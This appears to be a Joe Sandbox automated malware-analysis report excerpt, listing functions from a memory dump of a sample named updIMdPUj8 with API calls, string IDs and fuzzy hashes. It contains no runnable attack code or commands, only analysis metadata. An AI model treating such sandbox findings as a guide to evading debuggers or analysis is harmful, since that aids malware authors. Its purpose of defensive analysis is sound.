                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: File$CloseHandle$AttributesCreateDelete_wcslen$BuffersCurrentErrorFlushH_prologLastProcessTime
                                                                                                                                                                          • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                                                                                                          • API String ID: 3983180755-3508440684
                                                                                                                                                                          • Opcode ID: 06f8078bd221cf5f46867011098d20227382e5ef0e95921c50b2a25ca5575bdf
                                                                                                                                                                          • Instruction ID: 0953651049248287893d2d15e16ed86f6fd9fd780a058661dcb0657dbabdc2b5
                                                                                                                                                                          • Opcode Fuzzy Hash: 06f8078bd221cf5f46867011098d20227382e5ef0e95921c50b2a25ca5575bdf
                                                                                                                                                                          • Instruction Fuzzy Hash: 5EC1D871944624ABDB21DB74EC81FEEB3E8EF04700F0445D9F95EE3282DB34AA448B65
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: __floor_pentium4
                                                                                                                                                                          • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                          • API String ID: 4168288129-2761157908
                                                                                                                                                                          • Opcode ID: 31c7c2df1016e1959e66024c8adb65023c9a92e11eea84537b245a885ad08368
                                                                                                                                                                          • Instruction ID: 57c1817e8edf342b7d23bc5c042618e8e380532ad1c3384026a586c4353eaf12
                                                                                                                                                                          • Opcode Fuzzy Hash: 31c7c2df1016e1959e66024c8adb65023c9a92e11eea84537b245a885ad08368
                                                                                                                                                                          • Instruction Fuzzy Hash: 61C21571E086288FDB25CE289D807AAB7F5FB48305F1541EAD85EE7241E774AF819F40
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: H_prolog_swprintf
                                                                                                                                                                          • String ID: CMT$h%u$hc%u
                                                                                                                                                                          • API String ID: 146138363-3282847064
                                                                                                                                                                          • Opcode ID: 76e45636680df4786287c53981f7dd167f82c12c1f833892731c3e0df8dd8e68
                                                                                                                                                                          • Instruction ID: 9e624fd78ee81d9bea4490bbc29ef537c7812083a372652afad50e5a7935a994
                                                                                                                                                                          • Opcode Fuzzy Hash: 76e45636680df4786287c53981f7dd167f82c12c1f833892731c3e0df8dd8e68
                                                                                                                                                                          • Instruction Fuzzy Hash: 2732E571510294ABDF14DF74D895AEA3BE5EF15700F0804BDFD8E8B282DB789A49CB60
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog.LIBCMT ref: 00B22874
                                                                                                                                                                          • _strlen.LIBCMT ref: 00B22E3F
                                                                                                                                                                            • Part of subcall function 00B302BA: __EH_prolog.LIBCMT ref: 00B302BF
                                                                                                                                                                            • Part of subcall function 00B31B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00B2BAE9,00000000,?,?,?,0001046A), ref: 00B31BA0
                                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B22F91
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: H_prolog$ByteCharMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
                                                                                                                                                                          • String ID: CMT
                                                                                                                                                                          • API String ID: 1206968400-2756464174
                                                                                                                                                                          • Opcode ID: 187e00df39417034561825f8e455ad680c69117313d7ab2b87bdba86923919f7
                                                                                                                                                                          • Instruction ID: 31daec0c6b9122fd1b63be4dfad906e07a1e4dec8e16656594d831039ea226d3
                                                                                                                                                                          • Opcode Fuzzy Hash: 187e00df39417034561825f8e455ad680c69117313d7ab2b87bdba86923919f7
                                                                                                                                                                          • Instruction Fuzzy Hash: 9962E3716002659FDB19DF38D8866EA3BE1EF54300F0845BEEC9ECB282DB759945CB60
                                                                                                                                                                          APIs
                                                                                                                                                                          • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00B3F844
                                                                                                                                                                          • IsDebuggerPresent.KERNEL32 ref: 00B3F910
                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00B3F930
                                                                                                                                                                          • UnhandledExceptionFilter.KERNEL32(?), ref: 00B3F93A
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 254469556-0
                                                                                                                                                                          • Opcode ID: ef060acd4688c7f8693e634bfb486a6d15693d5c3ae2d46ab7d4e4cdb16c7506
                                                                                                                                                                          • Instruction ID: 820b576ba8131e2291d25ea6e3b32fb8fb163fed4b20640de6d37160bffe8c2c
                                                                                                                                                                          • Opcode Fuzzy Hash: ef060acd4688c7f8693e634bfb486a6d15693d5c3ae2d46ab7d4e4cdb16c7506
                                                                                                                                                                          • Instruction Fuzzy Hash: 1A310375D4531D9BDB21DFA4D989BCCBBF8AF08704F2041EAE40CAB250EB719A848F44
                                                                                                                                                                          APIs
                                                                                                                                                                          • VirtualQuery.KERNEL32(80000000,00B3E5E8,0000001C,00B3E7DD,00000000,?,?,?,?,?,?,?,00B3E5E8,00000004,00B81CEC,00B3E86D), ref: 00B3E6B4
                                                                                                                                                                          • GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,00B3E5E8,00000004,00B81CEC,00B3E86D), ref: 00B3E6CF
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: InfoQuerySystemVirtual
                                                                                                                                                                          • String ID: D
                                                                                                                                                                          • API String ID: 401686933-2746444292
                                                                                                                                                                          • Opcode ID: cb4c624e9d5b57c9442ab15faa8ad5d9defab532c02a13a75a32cb4e9c96a147
                                                                                                                                                                          • Instruction ID: 1d98c8ba1940f587e636874a4adc6fa2c3d643508bfa3344566689d997022d5f
                                                                                                                                                                          • Opcode Fuzzy Hash: cb4c624e9d5b57c9442ab15faa8ad5d9defab532c02a13a75a32cb4e9c96a147
                                                                                                                                                                          • Instruction Fuzzy Hash: 83012B32600209ABDF14DE29DC49BDD7BEAEFC4324F1CC161ED29D7290DA38ED058680
                                                                                                                                                                          APIs
                                                                                                                                                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00B48FB5
                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00B48FBF
                                                                                                                                                                          • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 00B48FCC
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3906539128-0
                                                                                                                                                                          • Opcode ID: 0c091d5bfb894bd80b3db104e0b665647f376380614eabd861ffa507ee446f43
                                                                                                                                                                          • Instruction ID: 7a961065e1282d2df46a3ce8e24ab051cf47170f76ced2fb0c405a0112af35bb
                                                                                                                                                                          • Opcode Fuzzy Hash: 0c091d5bfb894bd80b3db104e0b665647f376380614eabd861ffa507ee446f43
                                                                                                                                                                          • Instruction Fuzzy Hash: 8731A275941219ABCB21DF64D889B9DBBF8AF08310F6041EAE81CA7250EB709F858F44
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
                                                                                                                                                                          • Instruction ID: b6361c669ba32694cc8c55506c88949c2a4028ee6ae60cb1c326c39b2057cc9e
                                                                                                                                                                          • Opcode Fuzzy Hash: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
                                                                                                                                                                          • Instruction Fuzzy Hash: 5C021C71E002199FDF14CFA9C9806ADB7F1EF98314F2582AAD919E7384D731AE41DB90
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00B3AF35
                                                                                                                                                                          • GetNumberFormatW.KERNEL32(00000400,00000000,?,00B5E72C,?,?), ref: 00B3AF84
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FormatInfoLocaleNumber
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2169056816-0
                                                                                                                                                                          • Opcode ID: cbf87bc8048f41259552c04be7df9431825a01ae921465c70a0e693b1107337f
                                                                                                                                                                          • Instruction ID: 8a90af6f892e7ed739c6318f60e2f4485191f49a398b5a2ba6622ceb54500aba
                                                                                                                                                                          • Opcode Fuzzy Hash: cbf87bc8048f41259552c04be7df9431825a01ae921465c70a0e693b1107337f
                                                                                                                                                                          • Instruction Fuzzy Hash: F601713A100309AAD7119F74DC45F9A77FCEF0C751F104062FA19E7250D7709A54CBA5
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetLastError.KERNEL32(00B26DDF,00000000,00000400), ref: 00B26C74
                                                                                                                                                                          • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00B26C95
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorFormatLastMessage
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3479602957-0
                                                                                                                                                                          • Opcode ID: aa73affe4d522077357fb9115a8454b065f1d2ffcdbb10c041fe6452da999143
                                                                                                                                                                          • Instruction ID: 11b536adb00d17f8276fa343ff846302aa6b69135694942c3d9d06fc6e0f618c
                                                                                                                                                                          • Opcode Fuzzy Hash: aa73affe4d522077357fb9115a8454b065f1d2ffcdbb10c041fe6452da999143
                                                                                                                                                                          • Instruction Fuzzy Hash: A2D0A930344300BFFA021F219C46F6B3BD8FF40F82F28C084B788E90E0CA708820A628
                                                                                                                                                                          APIs
                                                                                                                                                                          • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00B519EF,?,?,00000008,?,?,00B5168F,00000000), ref: 00B51C21
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ExceptionRaise
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3997070919-0
                                                                                                                                                                          • Opcode ID: 94cb295f7cb3a36e619af9ffa93204fe5f4f7a26f30a8565660f5b3c396cc469
                                                                                                                                                                          • Instruction ID: 7f29844b0e8134ca67c65fa9c8e12dccb4f5cc22fe65a721e5a5eeb941bf7f4a
                                                                                                                                                                          • Opcode Fuzzy Hash: 94cb295f7cb3a36e619af9ffa93204fe5f4f7a26f30a8565660f5b3c396cc469
                                                                                                                                                                          • Instruction Fuzzy Hash: A7B14B356106089FD715CF2CC48AB657BE0FF45366F258AD8E8A9CF2A1C336E995CB40
                                                                                                                                                                          APIs
                                                                                                                                                                          • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00B3F66A
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FeaturePresentProcessor
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2325560087-0
                                                                                                                                                                          • Opcode ID: d991eeba82253627388837c87dfedd13f613403faded23fc99088052afaa68ca
                                                                                                                                                                          • Instruction ID: bc9e1622672ac5bc49d39bee17d330a441d5d336fbb008026d15aec85c1025aa
                                                                                                                                                                          • Opcode Fuzzy Hash: d991eeba82253627388837c87dfedd13f613403faded23fc99088052afaa68ca
                                                                                                                                                                          • Instruction Fuzzy Hash: C1512871D0161ADBDB28CF98E9857AABBF4FB48314F2489BAD411EB260D774ED01CB50
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetVersionExW.KERNEL32(?), ref: 00B2B16B
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Version
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1889659487-0
                                                                                                                                                                          • Opcode ID: 46935cc225d084c7bbb4fa68af25da43a920c65444ccfb61481ffe38e376ae29
                                                                                                                                                                          • Instruction ID: c1f757c88ebdea8bdcde5256b0e34d18f68ee1f3c3095ab9e8250ac8d2f10494
                                                                                                                                                                          • Opcode Fuzzy Hash: 46935cc225d084c7bbb4fa68af25da43a920c65444ccfb61481ffe38e376ae29
                                                                                                                                                                          • Instruction Fuzzy Hash: 5EF01DB4D002588FDB18CB18EC92ADA73F1EB48716F1446D5D519933D0CBB4AA80CF60
                                                                                                                                                                          Strings
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: gj
                                                                                                                                                                          • API String ID: 0-4203073231
                                                                                                                                                                          • Opcode ID: 8fada072f4f6f225a31c6f682f7e012d7212e3ead73703bcb171ee40a208f938
                                                                                                                                                                          • Instruction ID: 58ac7b3fe629605f0c3305c3d80b1698b9a3464288cb9d847ea56febd42d60a0
                                                                                                                                                                          • Opcode Fuzzy Hash: 8fada072f4f6f225a31c6f682f7e012d7212e3ead73703bcb171ee40a208f938
                                                                                                                                                                          • Instruction Fuzzy Hash: C3C14672A183858FC354CF29D88065AFBE1BFC8708F19896DE998D7311D734E948CB96
                                                                                                                                                                          APIs
                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(Function_0001F9F0,00B3F3A5), ref: 00B3F9DA
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ExceptionFilterUnhandled
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3192549508-0
                                                                                                                                                                          • Opcode ID: 98bfdf45c05133ca5b82d11f0cfbd4aaa0b4c84ed0cc398ec43c5111cd4114c1
                                                                                                                                                                          • Instruction ID: c6bd5b9f311f0b57fb5d6147f93841e595ad180c8cd89f21467b3866521bcb7a
                                                                                                                                                                          • Opcode Fuzzy Hash: 98bfdf45c05133ca5b82d11f0cfbd4aaa0b4c84ed0cc398ec43c5111cd4114c1
                                                                                                                                                                          • Instruction Fuzzy Hash:
                                                                                                                                                                          APIs
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: HeapProcess
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 54951025-0
                                                                                                                                                                          • Opcode ID: 29f6e9e8f213b3e5d13dd536171a0cf1c55b0e3a4cc2efa9c4f481391ae1e4e6
                                                                                                                                                                          • Instruction ID: b40df6126359794eb5abf4b3fa8f8f70c537afa51211fb299beee1047b739c2c
                                                                                                                                                                          • Opcode Fuzzy Hash: 29f6e9e8f213b3e5d13dd536171a0cf1c55b0e3a4cc2efa9c4f481391ae1e4e6
                                                                                                                                                                          • Instruction Fuzzy Hash: 06A011302022008B83008F30AE083083AE8AA00AC230800AAA008C2230EE2080A0AB00
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 5f8113f2fe17e1fe5adf28291dd6dc1f64d00099287cbfcd1ac5a0770544dab2
                                                                                                                                                                          • Instruction ID: 1b3766faafedd3b5fedb668896054c934f2020ddc133a708c149864693badb95
                                                                                                                                                                          • Opcode Fuzzy Hash: 5f8113f2fe17e1fe5adf28291dd6dc1f64d00099287cbfcd1ac5a0770544dab2
                                                                                                                                                                          • Instruction Fuzzy Hash: A362C871604785AFCB25CF28C4906B9BBE1EF99304F28C9ADD8DA8B346D734E945CB11
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: bb9617cfb9dcd5ed73515ceaa1cdae9c81077d575e7d9551ef57e855e6e5c47f
                                                                                                                                                                          • Instruction ID: 2ba64c84c7086e5b7857d84d3a434bbbf250033399441f138d6339f984b289e8
                                                                                                                                                                          • Opcode Fuzzy Hash: bb9617cfb9dcd5ed73515ceaa1cdae9c81077d575e7d9551ef57e855e6e5c47f
                                                                                                                                                                          • Instruction Fuzzy Hash: 9862FAB16487859FCB25CF28C4C06B9BBE1FF95304F2885ADE8968B346DB30E945CB15
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 07bf4a65aa449dff48fd2b0c9f6b18a690921bffffe8b35fa307a18f9ecacfdb
                                                                                                                                                                          • Instruction ID: cba5b3c9d89f1f5ebac7afe5bbfa5ba74180aed63517b50a56a64ed99c4e07db
                                                                                                                                                                          • Opcode Fuzzy Hash: 07bf4a65aa449dff48fd2b0c9f6b18a690921bffffe8b35fa307a18f9ecacfdb
                                                                                                                                                                          • Instruction Fuzzy Hash: F9524972A187018FC718CF19C891A6AF7E1FFCC304F498A2DE5959B255D334EA19CB86
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: H_prolog
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3519838083-0
                                                                                                                                                                          • Opcode ID: 7e098e064a496068c191465ece618fba65c03bd28ecc5baadd1ab7fb06d5cefb
                                                                                                                                                                          • Instruction ID: 57c586db88efdd9b62ceff44d7bd1a8e599572cd3660e2358625263cedefa190
                                                                                                                                                                          • Opcode Fuzzy Hash: 7e098e064a496068c191465ece618fba65c03bd28ecc5baadd1ab7fb06d5cefb
